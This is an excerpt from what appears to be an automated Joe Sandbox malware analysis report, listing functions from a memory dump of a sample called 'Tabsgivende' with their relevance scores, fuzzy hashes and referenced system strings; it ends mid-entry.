Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: bfab9cdc20b3400d7f5fe1d17f5d4f160d444d57d2717bc730ed408c415e2d64
Instruction ID: 981ce7b674ade6a84961f70ae3e873f9144511642f2f81176a67ee39aade94ae
Opcode Fuzzy Hash: bfab9cdc20b3400d7f5fe1d17f5d4f160d444d57d2717bc730ed408c415e2d64
Instruction Fuzzy Hash: 72E16F71E00758AFEB118F94CA80B9EBBB9EF54754F108626F900EB2D1D7B8D980CB51

Function 225EA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 225EA44B
`, xrefs: 225EA551

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 3ae01a52bdd21cd56490397d465575a164ee3be89bf582e1ac1ce6399f21eb0b
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 32C1D0712043429BDB15CF24C941B2BBBE5EFD4358F148A2DFA9ACA290D778D905CB82

Function 2259E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Legacy, xrefs: 2259E75A
UEFI, xrefs: 2259E751

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: a751038baeda7a319edc744028af29d9e3a71d0e57ab96cbc60c98ef52a8eadc
Instruction ID: f3d49da37f8d33c35474d438319c5f8252427bfc473aad234582ff512e86e936
Opcode Fuzzy Hash: a751038baeda7a319edc744028af29d9e3a71d0e57ab96cbc60c98ef52a8eadc
Instruction Fuzzy Hash: 2D615C71E007189FDB14CFA8CA80BAEBBB5FB48714F10856EE649EB251D731E940CB91

Function 22552E9C Relevance: 2.6, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 2259280C
RtlpInsertAssemblyStorageMapEntry, xrefs: 22592807

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
API String ID: 0-2104531740
Opcode ID: 7bc6dc0a0ef8e37083d9682cae9972069264341cc619ea99b74429048e7dc4fc
Instruction ID: 1ab6d8b5eb409b19bbded64f1934bc6e2b27ea9961d82e08f881f02dd1a6197d
Opcode Fuzzy Hash: 7bc6dc0a0ef8e37083d9682cae9972069264341cc619ea99b74429048e7dc4fc
Instruction Fuzzy Hash: 2841ED36600701ABD715CF55C880EAAB7A5FF94B14F20C46AE948EB640E7B1DD81CBE0

Function 2255A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 2255A5E9
Cleanup Group, xrefs: 2255A5E4

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: c36039af01b9ee6b542fa072c6b997c81f196d5779743bade89c607ab25cadc7
Instruction ID: 0928d13660f600595392eca17bb4fa532cefaf618b08f816626e88524ea35014
Opcode Fuzzy Hash: c36039af01b9ee6b542fa072c6b997c81f196d5779743bade89c607ab25cadc7
Instruction Fuzzy Hash: E901F4B2644740AFE311CF24CD85F2677E8E78471AF01C93ABA58C7290E378E818CB46

Function 2252C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 2252C8C3, 2252CA40

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 9b6cdaff3bd0d8662edb399d2c2e46b5a5f1d923aa55010c67a969da06022b6d
Instruction ID: e5b68b2f05aaf6043c4c2ca9e9534ad30e1777517c8cf7477d90c53761aa9d76
Opcode Fuzzy Hash: 9b6cdaff3bd0d8662edb399d2c2e46b5a5f1d923aa55010c67a969da06022b6d
Instruction Fuzzy Hash: 3A825A75E01B188FDB24CFA9C980BADBBB1FF48354F11C26AE919AB2D1D7709941CB50

Function 225CA118 Relevance: 2.1, APIs: 1, Instructions: 591timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 225CA13A

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 058f037d02cdd1acb349114cb51055724ec749e5bd3059f55b395d8e57e4d20c
Instruction ID: d018ae7b277056e16afb02a5969cf996a2081b19ad2f1f4643f040b21c60c1b2
Opcode Fuzzy Hash: 058f037d02cdd1acb349114cb51055724ec749e5bd3059f55b395d8e57e4d20c
Instruction Fuzzy Hash: FD22AB746147608ADB15CFA9C190762BFF1EF44348F14C95AF9868B286F33DE992CB60

Function 22526A50 Relevance: 2.0, APIs: 1, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3213259a52586146e19284d53a6269c6ac3075bfa953a7025bb4fb9406f56144
Instruction ID: 28c00373b61599f1c5a5a5859b014f7403d2d8fc6f1c864d05e8b9c5778734ef
Opcode Fuzzy Hash: 3213259a52586146e19284d53a6269c6ac3075bfa953a7025bb4fb9406f56144
Instruction Fuzzy Hash: 9B326971A00705CFCB15CF69C580B9ABBF1FB48314F10CA69E955AB2A1DB74ED41CB91

Function 225265D0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 886ace9f5eaec1fb1ff1eeb8b6b49df9e1f3873248bd8ca145bb846ec44355ec
Instruction ID: ece59e34d72985c3e88fedefb7b624cb250ff31c41c2e41b44bd95ed04b187d7
Opcode Fuzzy Hash: 886ace9f5eaec1fb1ff1eeb8b6b49df9e1f3873248bd8ca145bb846ec44355ec
Instruction Fuzzy Hash: 8DE17B71609742CFC704CF28C590A5ABBE0FF89318F058A6DE9999B391DB31ED45CB92

Function 2254E5E7 Relevance: 1.8, APIs: 1, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bd96dd6fd6778dc5e27ace44bebe5412a253639ba97980371bf2c937ab33a15
Instruction ID: 9db62f45e922ab12fc21c595db3e093f3797dc67ad40726b3445e2aa4b333e6e
Opcode Fuzzy Hash: 6bd96dd6fd6778dc5e27ace44bebe5412a253639ba97980371bf2c937ab33a15
Instruction Fuzzy Hash: 9FA1F431E00354AFDB11CF54C944FAEBBA4EB48764F118655EB10AB291DFB89E80CB92

Function 2251AE90 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e43f3b84f33727a1e968c7238b18e1466e23831801b7c767ecdf0ddc918f9d2
Instruction ID: cb2329fac58daba5a165861bb2d293a175a67560ddffcf00e585b357c61e7380
Opcode Fuzzy Hash: 4e43f3b84f33727a1e968c7238b18e1466e23831801b7c767ecdf0ddc918f9d2
Instruction Fuzzy Hash: D251B47AA057859FEB06CF64C680B5DBFB1AB44714F10CA1AE805A7391D338E940CB65

Function 2252262C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 22522710

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 8cfc880c3fe159f05631defbfb4093d426e5b6d8c9bc1256fabf5de002eef1d0
Instruction ID: 2d4e2351366115ad46142ba1efb4a02e3b7f616a5cb43fadba8e9ec1cb724cae
Opcode Fuzzy Hash: 8cfc880c3fe159f05631defbfb4093d426e5b6d8c9bc1256fabf5de002eef1d0
Instruction Fuzzy Hash: 9341497A505B049FC755DF24CA40B59BBB1EF94310F14C6AAC419DB2E1DBB0EA81CB51

Function 225A07C3 Relevance: 1.6, APIs: 1, Instructions: 114timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 225A083C

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 1e5b3f81b23378753f82fc62f7a2862dfd0688474a438988ea205dff7a244ab2
Instruction ID: 5bfcf10307caab6266fecbad06f4a46ce81862ee5dc36f39807e512ae26998c4
Opcode Fuzzy Hash: 1e5b3f81b23378753f82fc62f7a2862dfd0688474a438988ea205dff7a244ab2
Instruction Fuzzy Hash: 07418D729143019FD360CF29C845BABBBE8FF88364F108A2AF998C7251D774D944CB92

Function 22524859 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 225248F7

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 70f7fb8c67cca30c949f3ef9c247a9b0809a94702c502bd63b3a762e4d44c78e
Instruction ID: 9ff8bfb1a32e9fee09638ad9af0ba93d8f3b9c4946330e8cab26c6d377c0e6c4
Opcode Fuzzy Hash: 70f7fb8c67cca30c949f3ef9c247a9b0809a94702c502bd63b3a762e4d44c78e
Instruction Fuzzy Hash: EF41E2312147018BC715CF28C994B2ABBE9FFC0364F10CA2DEA459B2D1DB70E941CB91

Function 225CEBD0 Relevance: 1.6, APIs: 1, Instructions: 91timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 225CEC31

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 85a0df9269afc7a9a8d96330ec3c3a25af2f77aec70ce23911974a2fc17d37ba
Instruction ID: 3040b4052bd6a0e9e061d5f7337ac7f93cf704c307f0995354e0be97ae17c29b
Opcode Fuzzy Hash: 85a0df9269afc7a9a8d96330ec3c3a25af2f77aec70ce23911974a2fc17d37ba
Instruction Fuzzy Hash: 763167B25093419FC702CF59C68095ABBF1FF89218F4489AEE4889B355E331EE45CB92

Function 225AA4B0 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 225AA51A

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: ecb5892c665cb9a910c4104279d662881817b8932dcb5ea65c7b20476f29f272
Instruction ID: 9f96be4f1e1fc9b5af47f1464d7f0d0788f359db71a92f390fab15c289dc1c21
Opcode Fuzzy Hash: ecb5892c665cb9a910c4104279d662881817b8932dcb5ea65c7b20476f29f272
Instruction Fuzzy Hash: EE019736101209ABCF128F84CD41EDE3F76FB4C764F068201FE1866220C63AE9B0EB81

Function 22558EF5 Relevance: 1.5, APIs: 1, Instructions: 27timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 22558F26

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 6ca32f0c907a6074fcdae38cacab03a924b05a9edad631527575acb5adbdcc41
Instruction ID: f19d38d176653013e55af67c0c51600f89cf315f57a222468674d8da01b0fdf4
Opcode Fuzzy Hash: 6ca32f0c907a6074fcdae38cacab03a924b05a9edad631527575acb5adbdcc41
Instruction Fuzzy Hash: 7CE092353263508BCF224F209B1876C7F92AF09694BD4949FE8459B702CA1CE8E3EA40

Function 225A6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 225A65C1

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: ce4b3754750ed213e251bcc8782476a33d27a63e78aa740e2fb8f65322d6ee90
Instruction ID: 4e420824a564ca33727fdae9a713359d852375dac62c0a639e5a2028a780c0a7
Opcode Fuzzy Hash: ce4b3754750ed213e251bcc8782476a33d27a63e78aa740e2fb8f65322d6ee90
Instruction Fuzzy Hash: F0914F71941319ABEB11DF94DD95FAEBBF8EF58754F208065F600AB290DA74ED00CBA0

Function 2255A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 225967C9

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: b8257093782f231906f53ec2aab74c62d814b0cfe438c7f51520515ebb5a00ed
Instruction ID: 6953146c2a62cc6b720d2825bbc2e7567b41aa028a6a953e61f00cb6643eba06
Opcode Fuzzy Hash: b8257093782f231906f53ec2aab74c62d814b0cfe438c7f51520515ebb5a00ed
Instruction Fuzzy Hash: B6717C75E0034A9FDB18CFA8D690A9DBBF1FF88714F10C52AE905AB241EB359945CB90

Function 225E8B28 Relevance: 1.4, Strings: 1, Instructions: 152COMMON

Download Yara Rule

Strings

Pha", xrefs: 225E8C11

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: Pha"
API String ID: 0-84627748
Opcode ID: c851deb481a8e69cde7ace9526d0378f419fcd6d8a4d9d1db0dafbfbdf56ae9d
Instruction ID: a6bed1b229f19084d4b75ae3fcb24227e9364542a62a9524137f2952e4121e03
Opcode Fuzzy Hash: c851deb481a8e69cde7ace9526d0378f419fcd6d8a4d9d1db0dafbfbdf56ae9d
Instruction Fuzzy Hash: 5041F4707027109BC715CB29CA98F6BBBDAEFD1364F44C659E95F8B2A0DB38D801C691

Function 2253E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 2253E6A4

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 86952378b557d70e564c2850cd55204e5bcf799a6f6bd58e8bc6103690e34c57
Instruction ID: fdaef57ee55b0aa2dfc8d4dab7f9f6388c00f1a1acc59087692e63cc55118d49
Opcode Fuzzy Hash: 86952378b557d70e564c2850cd55204e5bcf799a6f6bd58e8bc6103690e34c57
Instruction Fuzzy Hash: 1A4182725093859BD712CB75C980B6BB7E8EFC8718F009A2DFA84D7180EA74D904C793

Function 22520BCD Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

pfa", xrefs: 22520BCF

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: pfa"
API String ID: 0-2947011344
Opcode ID: 935f08a4ac8c13dd7d623e6cfc36af16134f1d7b00f6f40869f34c29a8877bd2
Instruction ID: f5a0484b634ad2cdf76ca4ebd4c9fcc2bc18e34b23dea752d731fb0ce1669e25
Opcode Fuzzy Hash: 935f08a4ac8c13dd7d623e6cfc36af16134f1d7b00f6f40869f34c29a8877bd2
Instruction Fuzzy Hash: 4141A271A417289BCB21DF64C940BEEBBB4EF95740F0181A9E908AF281D774DE85CF91

Function 2259C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 2259C77F

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: a66b96ccab8311e8f0b31d1d930589bffe4154802ca94942a71c116f83ed7b87
Instruction ID: 21e82c20997fac3cc8664ba75c647ccf202b174baaf59629336cafdb8fa43440
Opcode Fuzzy Hash: a66b96ccab8311e8f0b31d1d930589bffe4154802ca94942a71c116f83ed7b87
Instruction Fuzzy Hash: CA4144B1D0132CEADB21CB50CD80FEEB77CAB44714F0085E5A608AB140DB709E898FE5

Function 2254A470 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

@3a", xrefs: 2254A5AD, 2258E1D3

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: @3a"
API String ID: 0-905693162
Opcode ID: 1d68245b1a91bd6b7735d4733a3bff268e9cca7e0d1ec2e3391cbfff23045739
Instruction ID: 50f275f29b08e41debe8f6c5a8e1205a86cce3cd8a9000a17dae9ae0229401b5
Opcode Fuzzy Hash: 1d68245b1a91bd6b7735d4733a3bff268e9cca7e0d1ec2e3391cbfff23045739
Instruction Fuzzy Hash: 67417032A40304CFDF45CF64C6A0BEDBBB0FB94354F548666E810AB795DB78A980DB50

Function 225B6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 225B6B91

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 0abbe7a77fb4aedc0f4a1ec89efbc37858ae31457a2b4a990a0316ec9b50e7e2
